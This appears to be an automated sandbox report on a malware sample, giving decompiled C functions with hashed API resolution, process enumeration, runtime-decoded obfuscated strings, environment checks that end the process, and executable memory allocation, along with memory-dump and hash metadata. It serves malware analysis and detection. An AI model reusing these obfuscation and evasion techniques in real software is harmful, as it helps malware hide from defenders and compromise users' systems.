											E00404CE0(_t364 - 0x64);
											E0040E430(_t364 - 0xc8, _t336, __eflags, _t364 - 0x178);
											E0040D0A0(_t364 - 0x178, _t344, __eflags);
											E00405890(_t364 - 0x178, _t344);
											asm("wait");
											 *(_t364 - 4) = 0xffffffff;
										}
										while(1) {
											_t152 =  *0x44d510; // 0x438f10
											_t19 = _t152 + 4; // 0x18
											_t20 =  *_t19 + 0x44d540; // 0x294728
											_t353 =  *( *_t20 + 4);
											 *(_t364 - 0x7c) = _t353;
											 *((intOrPtr*)( *_t353 + 4))();
											_t158 = E00403A70(_t263, _t336, _t344, _t364);
											_t369 = _t368 + 4;
											_t345 = _t158;
											_t337 =  *_t353;
											_t159 =  *((intOrPtr*)( *_t353 + 8))(_t364 - 0x80);
											if(_t159 != 0) {
												_t337 =  *_t159;
												 *( *_t159)(1);
											}
											goto L3;
										}
									}
									 *(_t364 - 4) = 6;
									asm("wait");
									E00405640(E00405600(_t364 - 0x48, 3), _t364 - 0x64);
									E004104C0(_t263, _t200, _t336, _t344, _t364, _t364 - 0x64, 0, 0xa);
									E00404CE0(_t364 - 0x64);
									E00405640(E00405600(_t364 - 0x48, 2), _t364);
									E00405640(E00405600(_t364 - 0x48, 1), _t364 - 0x64);
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									_t368 = _t372 + 0xc - 8;
									asm("movsd [esp], xmm0");
									_push(_t364);
									_push(_t364 - 0x64);
									E0040C590(_t263, _t364 - 0xc8);
									E00404CE0(_t364 - 0x64);
									L45:
									E00404CE0(_t364);
									asm("wait");
									 *(_t364 - 4) = 0xffffffff;
									while(1) {
										_t152 =  *0x44d510; // 0x438f10
										_t19 = _t152 + 4; // 0x18
										_t20 =  *_t19 + 0x44d540; // 0x294728
										_t353 =  *( *_t20 + 4);
										 *(_t364 - 0x7c) = _t353;
										 *((intOrPtr*)( *_t353 + 4))();
										_t158 = E00403A70(_t263, _t336, _t344, _t364);
										_t369 = _t368 + 4;
										_t345 = _t158;
										_t337 =  *_t353;
										_t159 =  *((intOrPtr*)( *_t353 + 8))(_t364 - 0x80);
										if(_t159 != 0) {
											_t337 =  *_t159;
											 *( *_t159)(1);
										}
										goto L3;
									}
								}
								 *(_t364 - 4) = 4;
								asm("wait");
								E00405640(E00405600(_t364 - 0x48, 2), _t364 - 0x64);
								E00405640(E00405600(_t364 - 0x48, 1), _t364);
								_push(_t364 - 0x64);
								_push(_t364);
								L0040F9F0(_t364 - 0xc8);
								E00404CE0(_t364);
								E00404CE0(_t364 - 0x64);
								asm("wait");
								 *(_t364 - 4) = 0xffffffff;
								continue;
							}
							 *(_t364 - 4) = 2;
							asm("wait");
							E00405640(E00405600(_t364 - 0x48, 1), _t364);
							_push(_t364);
							E0040FB00(_t364 - 0xc8);
							goto L45;
						}
						 *(_t364 - 4) = 0;
						asm("wait");
						E00405640(E00405600(_t364 - 0x48, 1), _t364);
						E0040C6A0(_t263, _t364 - 0xc8, _t336, _t364, _t364);
						goto L45;
					}
					E00404D20(_t263, _t364 - 0xc8, _t337);
					_t361 =  *(_t364 - 0x40);
					if(_t361 != 0) {
						_t327 =  *(_t364 - 0x38) - _t361;
						_t337 = 0x2aaaaaab * ( *(_t364 - 0x38) - _t361) >> 0x20 >> 1;
						_t248 = (0x2aaaaaab * ( *(_t364 - 0x38) - _t361) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * ( *(_t364 - 0x38) - _t361) >> 0x20 >> 1);
						_t383 = _t248 - 0x15555555;
						if(_t248 > 0x15555555) {
							_t248 = E0041A825(_t263, _t327, _t337, _t383);
						}
						if(_t248 + _t248 * 2 << 2 >= 0x1000) {
							_t385 =  *(_t364 - 0x40) & 0x0000001f;
							if(( *(_t364 - 0x40) & 0x0000001f) != 0) {
								E0041A825(_t263, _t327, _t337, _t385);
							}
							_t252 =  *(_t361 - 4);
							_t386 = _t252 - _t361;
							if(_t252 >= _t361) {
								_t252 = E0041A825(_t263, _t327, _t337, _t386);
							}
							_t363 = _t361 - _t252;
							_t387 = _t363 - 4;
							if(_t363 < 4) {
								_t252 = E0041A825(_t263, _t327, _t337, _t387);
							}
							_t388 = _t363 - 0x23;
							if(_t363 > 0x23) {
								_t252 = E0041A825(_t263, _t327, _t337, _t388);
							}
							_t361 = _t252;
						}
						L0041503F(_t361);
						_t371 = _t371 + 4;
						 *(_t364 - 0x40) = 0;
						 *(_t364 - 0x3c) = 0;
						 *(_t364 - 0x38) = 0;
					}
					_t238 =  *((intOrPtr*)(_t364 + 0x30));
					if(_t238 >= 0x10) {
						_t324 =  *(_t364 + 0x1c);
						if(_t238 + 1 >= 0x1000) {
							_t391 = _t324 & 0x0000001f;
							if((_t324 & 0x0000001f) != 0) {
								E0041A825(_t263, _t324, _t337, _t391);
							}
							_t242 =  *(_t324 - 4);
							_t392 = _t242 - _t324;
							if(_t242 >= _t324) {
								_t242 = E0041A825(_t263, _t324, _t337, _t392);
							}
							_t325 = _t324 - _t242;
							_t393 = _t325 - 4;
							if(_t325 < 4) {
								_t242 = E0041A825(_t263, _t325, _t337, _t393);
							}
							_t394 = _t325 - 0x23;
							if(_t325 > 0x23) {
								_t242 = E0041A825(_t263, _t325, _t337, _t394);
							}
							_t324 = _t242;
						}
						L0041503F(_t324);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t364 - 0xc));
					return 0;
				}
			}

0x00410b20
0x00410b20
0x00410b21
0x00410b25
0x00410b28
0x00410b2a
0x00410b35
0x00410b36
0x00410b3d
0x00410b43
0x00410b45
0x00410b46
0x00410b49
0x00410b50
0x00410b57
0x00410b5b
0x00410b62
0x00410b66
0x00410b69
0x00410b6d
0x00410b74
0x00410b78
0x00410b7f
0x00410b86
0x00410b8a
0x00410b91
0x00410b98
0x00410ba2
0x00410ba7
0x00410baa
0x00410baf
0x00410bb2
0x00410bc0
0x00410bc0
0x00410bc5
0x00410bc8
0x00410bce
0x00410bd1
0x00410bd8
0x00410bdf
0x00410be4
0x00410be7
0x00410be9
0x00410bed
0x00410bf2
0x00410bf4
0x00410bfa
0x00410bfa
0x00410bfc
0x00410c07
0x00410c16
0x00410c1b
0x00410c22
0x00410c38
0x00410c3c
0x00410c5a
0x00410c61
0x00410c70
0x00410c75
0x00410c76
0x00410c7b
0x00410c7e
0x00410c80
0x00410c83
0x00410c85
0x00410c87
0x00410c8a
0x00410c8d
0x00410c8f
0x00410c96
0x00410c96
0x00410c9b
0x00410ca2
0x00410ca9
0x00410cb1
0x00410cb1
0x00410cb6
0x00410cb9
0x00410cbc
0x00410cbe
0x00410cc6
0x00410cc6
0x00410c63
0x00410c63
0x00410c66
0x00410c6b
0x00410c6b
0x00410c3e
0x00410c48
0x00410c50
0x00410c55
0x00410c55
0x00410c24
0x00410c2e
0x00410c2e
0x00410cd2
0x00410cd6
0x00410ce0
0x00410ce4
0x00410ce6
0x00410cf1
0x00410cf6
0x00410cfb
0x00410df1
0x00410df4
0x00410df7
0x00410dfa
0x00410e00
0x00410e06
0x00410e0b
0x00410e0e
0x00410e11
0x00410e19
0x00410e1f
0x00410e24
0x00410e27
0x00410e29
0x00410e99
0x00410e9c
0x00410e9f
0x00410ea2
0x00410ea8
0x00410eae
0x00410eb3
0x00410eb6
0x00410eb9
0x00410ec1
0x00410ec7
0x00410ecc
0x00410ecf
0x00410ed1
0x00410f31
0x00410f34
0x00410f37
0x00410f3a
0x00410f40
0x00410f46
0x00410f4b
0x00410f4e
0x00410f51
0x00410f59
0x00410f5f
0x00410f64
0x00410f67
0x00410f69
0x00410ffe
0x00411001
0x00411004
0x00411007
0x0041100d
0x00411013
0x00411018
0x0041101b
0x0041101e
0x00411026
0x0041102c
0x00411031
0x00411034
0x00411036
0x004110fa
0x004110fd
0x00411100
0x00411103
0x00411109
0x0041110f
0x00411114
0x00411117
0x0041111a
0x00411122
0x00411128
0x0041112d
0x00411130
0x00411132
0x004111e1
0x004111e6
0x004111e9
0x00411138
0x00411138
0x0041113f
0x00411150
0x00411155
0x00411157
0x00411159
0x0041115e
0x00411165
0x0041116d
0x0041117f
0x0041118a
0x00411195
0x0041119a
0x0041119b
0x0041119b
0x00410bc0
0x00410bc0
0x00410bc5
0x00410bc8
0x00410bce
0x00410bd1
0x00410bd8
0x00410bdf
0x00410be4
0x00410be7
0x00410be9
0x00410bed
0x00410bf2
0x00410bf4
0x00410bfa
0x00410bfa
0x00000000
0x00410bf2
0x00410bc0
0x0041103c
0x00411043
0x00411054
0x00411061
0x0041106e
0x00411083
0x00411098
0x0041109d
0x004110a1
0x004110a5
0x004110a8
0x004110b0
0x004110b4
0x004110bb
0x004110c3
0x00410e57
0x00410e5a
0x00410e5f
0x00410e60
0x00410bc0
0x00410bc0
0x00410bc5
0x00410bc8
0x00410bce
0x00410bd1
0x00410bd8
0x00410bdf
0x00410be4
0x00410be7
0x00410be9
0x00410bed
0x00410bf2
0x00410bf4
0x00410bfa
0x00410bfa
0x00000000
0x00410bf2
0x00410bc0
0x00410f6f
0x00410f76
0x00410f87
0x00410f9c
0x00410fa4
0x00410fa8
0x00410faf
0x00410fb7
0x00410fbf
0x00410fc4
0x00410fc5
0x00000000
0x00410fc5
0x00410ed3
0x00410eda
0x00410eeb
0x00410ef3
0x00410efa
0x00000000
0x00410efa
0x00410e2b
0x00410e32
0x00410e43
0x00410e52
0x00000000
0x00410e52
0x00410d07
0x00410d0c
0x00410d11
0x00410d16
0x00410d1f
0x00410d26
0x00410d28
0x00410d2d
0x00410d2f
0x00410d2f
0x00410d3f
0x00410d41
0x00410d45
0x00410d47
0x00410d47
0x00410d4c
0x00410d4f
0x00410d51
0x00410d53
0x00410d53
0x00410d58
0x00410d5a
0x00410d5d
0x00410d5f
0x00410d5f
0x00410d64
0x00410d67
0x00410d69
0x00410d69
0x00410d6e
0x00410d6e
0x00410d71
0x00410d76
0x00410d79
0x00410d80
0x00410d87
0x00410d87
0x00410d8e
0x00410d94
0x00410d97
0x00410d9f
0x00410da1
0x00410da4
0x00410da6
0x00410da6
0x00410dab
0x00410dae
0x00410db0
0x00410db2
0x00410db2
0x00410db7
0x00410db9
0x00410dbc
0x00410dbe
0x00410dbe
0x00410dc3
0x00410dc6
0x00410dc8
0x00410dc8
0x00410dcd
0x00410dcd
0x00410dd0
0x00410dd5
0x00410ddd
0x00410deb
0x00410deb

Strings

Err: Invalid command, xrefs: 004111D1
p`), xrefs: 00410F54
generate, xrefs: 00410C40
update, xrefs: 00410C26
8G), xrefs: 00410E14

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Object$CreateSelect$Text$File$Messagestd::_$Exception@8LockitPathSendThrowWindowwave$DeleteMoveOpenPaint$AlignAllocColorHeapLockit::~_MonitorScriptString$BeginCloseCursorEnumEventFindFromHandleItemLineLockit::_NameRectSingleWait__libm_sse2_cos_precise$ActiveAnalyseButtonCheckedCommonCompactCompatibleCurrentEntriesErrorExtensionFacet_FontFontsFreeHeaderIconInfoInformationInstanceIos_base_dtorKillLastLoadMappingMenuModeNotifyPixelPolylinePrefixPrepareProcessQueryReadRegisterSectionShell_SizeTimerTranslateViewVirtualWriteXinvalid_argumentstd::ios_base::_wnsprintf
String ID: 8G)$Err: Invalid command$generate$p`)$update
API String ID: 3149903461-958278345
Opcode ID: f0a71ed9743e0b0419d982d632d03b0aae950ccbe3d9f498c392d7e469972afe
Instruction ID: 7e3806f2efbfc5616e8764e72f2ae777b9779229e989adb697ac07f0582edc41
Opcode Fuzzy Hash: f0a71ed9743e0b0419d982d632d03b0aae950ccbe3d9f498c392d7e469972afe
Instruction Fuzzy Hash: B702D271A00208AFDB14EF65CC55BEE77B4EF44308F50452EF815A71C1EB78AA89CB98

Uniqueness

Uniqueness Score: 100.00%

Function 0040744A, Relevance: 3.0, APIs: 2, Instructions: 33
processmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040744A(void* __ebx, void** __ecx, void* __eflags) {
				void* _t5;
				void* _t6;
				void** _t16;

				_t16 = __ecx;
				E004010BB(__ebx, 1, 0x5bc1d14f);
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t16[1] = _t5;
				_t6 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				 *_t16 = _t6;
				if(_t6 != 0) {
					 *_t6 = 0x22c;
					if(_t16[1] != 0xffffffff) {
						E0040742F(_t16[1],  *_t16); // executed
					}
				}
				return _t16;
			}

0x00407453
0x00407455
0x00407460
0x0040746e
0x00407474
0x0040747a
0x0040747e
0x00407480
0x00407486
0x0040748d
0x00407493
0x00407486
0x00407498

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000056,0000005E,004036B9), ref: 00407460
VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 00407474

Part of subcall function 0040742F: Process32FirstW.KERNEL32(?,?,?,00407492,?,?), ref: 00407446

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocCreateFirstLibraryLoadProcess32SnapshotToolhelp32Virtual
String ID:
API String ID: 1326449019-0
Opcode ID: 0f2a34b2ba878adcfdff27236e7a76df972b9ed9794c060f98bfca2a54dd17fa
Instruction ID: e53ccfa6527ee3f81572c1b87d4bd6efc0dbe988b1e154b9ba88334960b6878e
Opcode Fuzzy Hash: 0f2a34b2ba878adcfdff27236e7a76df972b9ed9794c060f98bfca2a54dd17fa
Instruction Fuzzy Hash: C2F0A0316083406AE2341B65AC0BF537EA4DF80B30F20453FF698AA2E1DAB5A8428618

Uniqueness

Uniqueness Score: 12.89%

Function 00404F8F, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F8F(void* __eax) {
				struct _SYSTEM_INFO _v40;
				void* _t7;

				E004010BB(_t7, 1, 0x24a0dd68);
				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}

0x00404fa0
0x00404fab
0x00404fb3

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,00401FD6), ref: 00404FAB

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: InfoLibraryLoadSystem
String ID:
API String ID: 2528439753-0
Opcode ID: 24632a8be01ea11aa5e3e337091831f6f37135eb933c80360ce479693ffdced0
Instruction ID: fbd59a50198e4fdc623d23471259ac4e0b9786480b883861b29933c19d0b93cd
Opcode Fuzzy Hash: 24632a8be01ea11aa5e3e337091831f6f37135eb933c80360ce479693ffdced0
Instruction Fuzzy Hash: 9DD023734083081BC618F5D57C42DBAB3BCD708310F10124AFC04B31C0DC13E84041E5

Uniqueness

Uniqueness Score: 0.02%

Function 00415FF1, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00015FFD), ref: 00415FF6

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0d7289ece12bb20bc410fb149b4fb723126fc8f8999da0bdf4f67d18ac52050c
Instruction ID: 8fed9ecdb6df629ca71b3a96b179f1646a8fda6d98d3c7dcc115293c6012393e
Opcode Fuzzy Hash: 0d7289ece12bb20bc410fb149b4fb723126fc8f8999da0bdf4f67d18ac52050c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.01%

Function 00405341, Relevance: 38.9, APIs: 12, Strings: 10, Instructions: 423
stringsynchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E00405341(void* __ebx, void* __eflags) {
				void* _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				short _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				char _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v340;
				short _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				char _v384;
				short _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				char _v428;
				short _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				char _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				short _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				char _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				char _v780;
				long _v812;
				void* __edi;
				void* _t215;
				void* _t217;
				void* _t219;
				void* _t221;
				intOrPtr* _t233;
				intOrPtr* _t238;
				intOrPtr* _t243;
				void* _t253;
				void* _t254;
				long _t256;
				void* _t257;
				void* _t259;
				void* _t264;
				intOrPtr* _t265;
				void* _t266;
				void* _t271;
				intOrPtr* _t272;
				void* _t275;
				void* _t276;
				void* _t277;
				long* _t293;
				WCHAR* _t310;
				WCHAR* _t311;
				WCHAR* _t312;
				void* _t313;
				long* _t314;
				void* _t322;
				void* _t323;

				_push(__ebx);
				E004010BB(__ebx, 1, 0x6c544060);
				SetErrorMode(1); // executed
				_v220 = 0xf1d55606;
				_v216 = 0x8bc9ccf3;
				_v212 = 0x40c4a1c6;
				_v208 = 0x483a27be;
				_v204 = 0x9f1faea3;
				_v200 = 0x9f1faeb3;
				_v196 = 0x7f3fb851;
				_v192 = 0xe79401ea;
				_v188 = 0x95c1c4ef;
				_v184 = 0x7eec092b;
				_v636 = E00407563( &_v220);
				_v260 = 0x7b267779;
				_v256 = 0xf11ba084;
				_v252 = 0xc75b477f;
				_v248 = 0x970a8497;
				_v244 = 0x7b53afb3;
				_v240 = 0x7b53afa3;
				_v236 = 0x48c7063d;
				_v232 = 0x4031cf7c;
				_v228 = 0x97cd33ae;
				_v224 = 0xca440ccd;
				_v632 = E00407563( &_v260);
				_v384 = 0xe059cae4;
				_v380 = 0x91a64ac7;
				_v376 = 0xf174e0d9;
				_v372 = 0x53f5791b;
				_v368 = 0x1a1220b9;
				_v364 = 0x1a1220ab;
				_v360 = 0x6cdcda15;
				_v356 = 0x7a6d086b;
				_v352 = 0x84e80abb;
				_v348 = 0x67c597de;
				_v344 = 0xff9a;
				_v628 = E00407563( &_v384);
				_v40 = 0xbeae1c0f;
				_v36 = 0xe46b08f2;
				_v32 = 0x51f0c44;
				_v28 = 0x105bec19;
				_v24 = 0x7c5f5c77;
				_v20 = 0x7c5f5c71;
				_v16 = 0x70a1592c;
				_v12 = 0x5191;
				_v624 = E00407563( &_v40);
				_v300 = 0x89453175;
				_v296 = 0x9bca272a;
				_v292 = 0xcfbe65d3;
				_v288 = 0x1e5094d2;
				_v284 = 0x1b174c42;
				_v280 = 0x1b174c52;
				_v276 = 0x5401e3fc;
				_v272 = 0x5a08d62d;
				_v268 = 0xa96c4367;
				_v264 = 0x90534988;
				_v620 = E00407563( &_v300);
				_v340 = 0x378adc93;
				_v336 = 0x873bda90;
				_v332 = 0x1fd2c419;
				_v328 = 0x777195d3;
				_v324 = 0xd4c758d3;
				_v320 = 0xd4c758c3;
				_v316 = 0x419db5a0;
				_v312 = 0xbb95c8a9;
				_v308 = 0x1613e62a;
				_v304 = 0x8f58bda4;
				_v616 = E00407563( &_v340);
				_v428 = 0x64606896;
				_v424 = 0x4e30924c;
				_v420 = 0xe87d51f2;
				_v416 = 0x7fede2e5;
				_v412 = 0x7b1c03bd;
				_v408 = 0x7b1c03af;
				_v404 = 0x74076d9d;
				_v400 = 0x334245f4;
				_v396 = 0xc970d27b;
				_v392 = 0xedfed203;
				_v388 = 0xbff8;
				_v8 = E00407563( &_v428);
				_v180 = 0xf4babd73;
				_v176 = 0x9d14747d;
				_v172 = 0x310258e3;
				_v168 = 0x2067a89d;
				_v164 = 0x819bc54c;
				_v160 = 0x819bc542;
				_v156 = 0xda362a17;
				_v152 = 0xf37e287b;
				_v148 = 0xa463c07;
				_v144 = 0xa9fd;
				_t215 = E00407563( &_v180);
				_v516 = 0x162f88ed;
				_v512 = 0xa4dd6041;
				_v508 = 0x414b298a;
				_v504 = 0x7c9515cc;
				_v500 = 0x1202025f;
				_v496 = 0x1202024b;
				_v492 = 0x3bbf5252;
				_v488 = 0x7d122497;
				_v484 = 0xc514f4c6;
				_v480 = 0x27fd98a7;
				_v476 = 0x8375a78f;
				_t217 = E00407563( &_v516);
				_v104 = 0xf54db11c;
				_v100 = 0x9cc3309a;
				_v96 = 0x4b221a3d;
				_v92 = 0xdfcf397c;
				_v88 = 0xd19f85f9;
				_v84 = 0xd19f85f1;
				_v80 = 0xf65ebd28;
				_v76 = 0xed3a6659;
				_t219 = E00407563( &_v104);
				_v72 = 0x547e88cc;
				_v68 = 0xb3a26b01;
				_v64 = 0x31eed98e;
				_v60 = 0xb94c26f;
				_v56 = 0xd600dbdd;
				_v52 = 0xd600dbdb;
				_v48 = 0x19cbf715;
				_v44 = 0x9f33;
				_t221 = E00407563( &_v72);
				_t323 = _t322 + 0x2c;
				E00401B43( &_v780, 1, _v636, 1, _v632, 1, _v628, 1, _v624, 1, _v620, 1, _v616, 1, _v8, 1, _t215, 1, _t217, 1, _t219, 0, _t221);
				E0040A4E1( &_v780); // executed
				_t228 = E0040C6BA(0x402 + E0040A37C( &_v780) * 2); // executed
				 *0x41988c = _t228;
				_t328 = _t228;
				if(_t228 == 0) {
					_push(_t228);
					L2:
					ExitProcess();
				}
				E004096FA( &_v780, _t328, _t228); // executed
				_v140 = 0x16292900;
				_v136 = 0xe88ad256;
				_v132 = 0x19520827;
				_v128 = 0x72f4ce53;
				_v124 = 0xabec0a4e;
				_v120 = 0xabec0a44;
				_v116 = 0xb5cd733c;
				_v112 = 0x4b1ee3e1;
				_v108 = 0xd998;
				E00401A92( *0x41988c, E00407563( &_v140));
				_t310 =  *0x41988c; // 0x6570000
				_t233 = E004010BB(0, 1, 0x2ca1b5f0);
				 *_t233(_t310, L"301");
				_v472 = 0x4b120bc;
				_v468 = 0xff4ef361;
				_v464 = 0x4d8962c6;
				_v460 = 0x49b840d;
				_v456 = 0x9b432fb;
				_v452 = 0x9b432e9;
				_v448 = 0x7ff863d2;
				_v444 = 0x85184af0;
				_v440 = 0x21c67f6b;
				_v436 = 0x4c81f0;
				_v432 = 0x5ec6;
				E00401A92( *0x41988c, E00407563( &_v472));
				_t311 =  *0x41988c; // 0x6570000
				_t238 = E004010BB(0, 1, 0x2ca1b5f0);
				 *_t238(_t311, L"1602");
				_v560 = 0xf2ebbcfc;
				_v556 = 0x9bc93cf;
				_v552 = 0xf1473005;
				_v548 = 0x7a977417;
				_v544 = 0x7a1a197d;
				_v540 = 0x7a1a1969;
				_v536 = 0xa0057165;
				_v532 = 0xcab2102c;
				_v528 = 0xaf7bfe9d;
				_v524 = 0xbeaca241;
				_v520 = 0xd819d38f;
				E00401A92( *0x41988c, E00407563( &_v560));
				_t312 =  *0x41988c; // 0x6570000
				_t243 = E004010BB(0, 1, 0x2ca1b5f0);
				 *_t243(L"5.2");
				_v612 = 0x4ff06218;
				_v608 = 0x3c296fe4;
				_v604 = 0x566cdf9a;
				_v600 = 0x31408047;
				_v596 = 0x921718b1;
				_v592 = 0x921718ab;
				_v588 = 0x5de8b625;
				_v584 = 0x463c3a1a;
				_v580 = 0xa97d7061;
				_v576 = 0x693b73e9;
				_v572 = 0x7f344d4d;
				_v568 = 0xa170bc72;
				_v564 = 0x8f2c;
				E00401A92( *0x41988c, E00407563( &_v612));
				_t313 = lstrlenW;
				_t323 = _t323 + 0x48;
				 *0x419894 = lstrlenW( *0x41988c) + _t248;
				E004074E3( *0x41988c, lstrlenW( *0x41988c) + _t250); // executed
				_t293 = _t312;
				_t253 = E0040C350(_t328);
				_t329 = _t253;
				if(_t253 != 0) {
					_t276 = E0040C469(0, _t329); // executed
					_t330 = _t276 - 0x2000;
					if(_t276 <= 0x2000) {
						_t277 = E0040C35C(0, _t293, _t330);
						_t331 = _t277 - 3;
						if(_t277 > 3) {
							__eflags = _t277 - 4;
							if(__eflags != 0) {
								goto L7;
							} else {
								__eflags = E0040EC32();
								if(__eflags == 0) {
									goto L7;
								} else {
									L12:
									_push(0);
									goto L2;
								}
							}
							L23:
						} else {
							E0040D6E6();
						}
					}
				}
				L7:
				_t254 = E0040C350(_t331);
				_t332 = _t254;
				if(_t254 != 0) {
					_t275 = E0040C469(0, _t332); // executed
					_t328 = _t275 - 0x1000;
					if(_t275 <= 0x1000) {
						_t228 = E00404007();
						goto L12;
					}
				}
				__eflags = E00401CAD();
				if(__eflags != 0) {
					L21:
					E00405157();
					asm("int3");
					_t256 = _v812;
					_push(_t313);
					_push(0x2ca1b5f0);
					_t314 = _t293;
					__eflags = 0;
					_t314[2] = 0;
					_t314[3] = 0;
					 *_t314 = _t256; // executed
					_t257 = VirtualAlloc(0, _t256, 0x3000, 0x40); // executed
					_t314[1] = 0;
					_t314[2] = _t257;
					_t314[3] = _t257;
					return _t314;
				} else {
					_t259 = E00404FB4(__eflags);
					__eflags = _t259;
					if(_t259 == 0) {
						goto L21;
					} else {
						E004021C5(); // executed
						E00401D43(); // executed
						InitializeCriticalSection(0x41982c);
						InitializeCriticalSection(0x419844);
						InitializeCriticalSection(0x41985c); // executed
						E00403AEE(0x419844, _t293, 0x41985c, __eflags); // executed
						DeleteCriticalSection(0x41985c);
						DeleteCriticalSection(0x41982c);
						DeleteCriticalSection(0x419844);
